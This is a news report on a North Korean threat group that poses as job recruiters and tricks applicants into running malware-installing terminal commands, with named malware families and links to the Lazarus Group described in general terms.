North Korean Fake Job Recruiters Intensify Their Covert Strategies

Recent cybersecurity findings reveal that a group of North Korean hackers engaged in fake IT recruitment schemes now has access to a sophisticated remote access Trojan, previously associated with the notorious Lazarus Group. This assessment comes from security experts who have been tracking these activities closely.

According to cybersecurity firm Eset, the North Korean threat actor operates under the alias “DeceptiveDevelopment.” This group is known for impersonating recruiters to lure victims through fraudulent job offers. While some activities bear resemblance to the Lazarus Group’s efforts, particularly incidents labeled as “Operation Dream Job,” Eset asserts that these two factions are distinct entities.

The DeceptiveDevelopment operations have been observed since 2023, targeting job seekers in Western markets. In June, the U.S. Department of Justice announced a coordinated crackdown across 16 states addressing North Korean remote IT scams. This operation resulted in multiple indictments, arrests, and significant seizures, highlighting the zealous nature of these cyber threats.

This campaign primarily targets Windows, macOS, and Linux systems, utilizing a deceptive method wherein victims are instructed to execute terminal commands during seemingly innocuous “pre-interviews.” One notable tactic, referred to as the “ClickFix trick,” saw a significant uptick of over 500% in attacks in the early half of this year.

DeceptiveDevelopment operators cleverly disguise themselves as recruiters on platforms like LinkedIn and various freelance marketplaces, guiding potential candidates through a series of technical evaluations that ultimately compromise their systems. Applicants are asked to perform tasks that involve running commands from a site that simulates a malfunctioning camera, a move designed to initiate malware downloads and execute first-stage payloads.

Once compromised, victims typically encounter malware like BeaverTail or its revised version, OtterCookie, which harvests sensitive browser and crypto wallet data. Eset’s findings reveal a second-stage payload, “InvisibleFerret,” which features a modular backdoor capable of stealing data and granting remote access.

In a noteworthy discovery, researchers identified a complex payload dubbed “Tropidoor,” which exhibits similarities to a previous Lazarus Group backdoor called “PostNapTea.” Eset emphasized that Tropidoor represents the most advanced malware yet linked to DeceptiveDevelopment, indicating a noteworthy correlation between these two North Korean entities.

Additionally, an emerging Windows remote-access malware, named “AkdoorTea,” was discovered in an archive utilizing legitimate Nvidia components mingled with harmful scripts, exposing the extensive capabilities of these threat actors.

It appears that data extracted from victims by DeceptiveDevelopment may be transferred to an affiliated group known as “WageMole,” which further highlights the interconnected nature of these cybercriminal operations coming out of North Korea and their ongoing threat to organizations worldwide.